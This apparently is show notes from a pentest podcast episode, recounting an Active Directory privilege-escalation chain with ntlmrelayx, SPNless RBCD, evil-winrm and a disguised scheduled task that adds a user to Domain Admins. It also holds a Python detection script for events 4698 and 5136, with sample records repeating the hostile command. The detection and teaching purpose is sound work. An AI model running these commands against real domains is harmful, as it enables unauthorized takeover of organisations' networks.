7MS #691: Tales of Pentest Pwnage – Part 75
Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? Yes. Do I mean it? Yes. Here are all the commands/links to supplement today's episode:
- Got an SA account to a SQL server through Snaffler-ing
- With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here
- I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv
- I didn’t have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here
- Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket
- From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName
- Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
- …and ran it: schtasks /run /tn "TotallyFineTask"
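For the blue-team side of this chain, here is an added example (my own detection sketch, not anything from the episode or from Brian's tooling) that flags the two loudest steps above in Windows event data: the RBCD write that SPNless RBCD depends on, which shows up as a Security event 5136 modifying msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object when Directory Service Changes auditing and a SACL on computer objects are enabled, and the scheduled task that runs as someone else's interactive session (schtasks /ru another-user /it) and calls net group ... /add, which shows up as a Security event 4698 whose TaskContent XML names a different principal than the account that created the task. The field names (SubjectUserName, TaskContent, AttributeLDAPDisplayName, ObjectDN, OperationType) are the standard EventData fields of those two events; the sample records below are constructed by hand to mirror the episode's commands, and the GROUP_CHANGE pattern is my own assumption about what counts as a privileged-group edit.

```python
"""Flag RBCD descriptor writes (5136) and cross-user scheduled tasks (4698)."""
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace used inside the TaskContent field of event 4698.
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Attribute written by resource-based constrained delegation setups.
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Assumed pattern for commands that add members to a group (constructed, extend as needed).
GROUP_CHANGE = re.compile(
    r"net1?\s+(local)?group\b.*\badd\b|Add-ADGroupMember|Add-LocalGroupMember",
    re.IGNORECASE,
)


def parse_task_xml(task_content):
    """Pull the run-as principal, logon type and Exec actions out of a task definition."""
    root = ET.fromstring(task_content)
    principal = root.find(f".//{TASK_NS}Principal")
    run_as = logon_type = ""
    if principal is not None:
        run_as = principal.findtext(f"{TASK_NS}UserId", default="")
        logon_type = principal.findtext(f"{TASK_NS}LogonType", default="")
    commands = []
    for exe in root.iter(f"{TASK_NS}Exec"):
        cmd = exe.findtext(f"{TASK_NS}Command", default="")
        args = exe.findtext(f"{TASK_NS}Arguments", default="")
        commands.append(f"{cmd} {args}".strip())
    return {"run_as": run_as, "logon_type": logon_type, "commands": commands}


def flag_task_creation(event):
    """Return reasons a 4698 (scheduled task created) record looks like session abuse."""
    task = parse_task_xml(event["TaskContent"])
    reasons = []
    creator = event["SubjectUserName"].lower()
    run_as = task["run_as"].split("\\")[-1].lower()
    if run_as and run_as != creator:
        reasons.append(f"task runs as {task['run_as']} but was created by {event['SubjectUserName']}")
    if task["logon_type"] == "InteractiveToken":
        # schtasks /it: the task rides an existing interactive logon instead of stored credentials.
        reasons.append("task is bound to another user's interactive session (InteractiveToken)")
    for command in task["commands"]:
        if GROUP_CHANGE.search(command):
            reasons.append(f"task command edits group membership: {command}")
    return reasons


def flag_directory_change(event):
    """Return reasons a 5136 (directory object modified) record looks like an RBCD write."""
    # OperationType %%14674 is "Value Added" in the raw event XML; accept either form.
    if event.get("AttributeLDAPDisplayName") == RBCD_ATTR and event.get("OperationType") in ("Value Added", "%%14674"):
        return [f"RBCD descriptor written on {event['ObjectDN']} by {event['SubjectUserName']}"]
    return []


# Constructed sample records shaped like the EventData of the two events.
SAMPLE_4698 = {
    "SubjectUserName": "lowpriv",
    "TaskName": "\\TotallyFineTask",
    "TaskContent": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>DOMAIN\a-domain-admin</UserId><LogonType>InteractiveToken</LogonType></Principal></Principals>
  <Actions Context="Author"><Exec><Command>net</Command><Arguments>group "Domain Admins" lowpriv /add /domain</Arguments></Exec></Actions>
</Task>""",
}
SAMPLE_4698_BENIGN = {
    "SubjectUserName": "svc-backup",
    "TaskName": "\\NightlyBackup",
    "TaskContent": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>DOMAIN\svc-backup</UserId><LogonType>Password</LogonType></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\backup\backup.exe</Command><Arguments>/full</Arguments></Exec></Actions>
</Task>""",
}
SAMPLE_5136 = {
    "SubjectUserName": "lowpriv",
    "ObjectDN": "CN=SQLBOX,CN=Computers,DC=domain,DC=local",
    "AttributeLDAPDisplayName": RBCD_ATTR,
    "OperationType": "%%14674",
}


def run_detections():
    """Evaluate the constructed samples and return findings keyed by task/object."""
    return {
        SAMPLE_4698["TaskName"]: flag_task_creation(SAMPLE_4698),
        SAMPLE_4698_BENIGN["TaskName"]: flag_task_creation(SAMPLE_4698_BENIGN),
        SAMPLE_5136["ObjectDN"]: flag_directory_change(SAMPLE_5136),
    }


if __name__ == "__main__":
    for key, reasons in run_detections().items():
        print(key, "->", reasons or "clean")
```

The creator-versus-principal mismatch is the signal worth alerting on by itself: legitimate tasks that run as a different account are normally created by an admin and use stored credentials, not an InteractiveToken bound to someone else's desktop session.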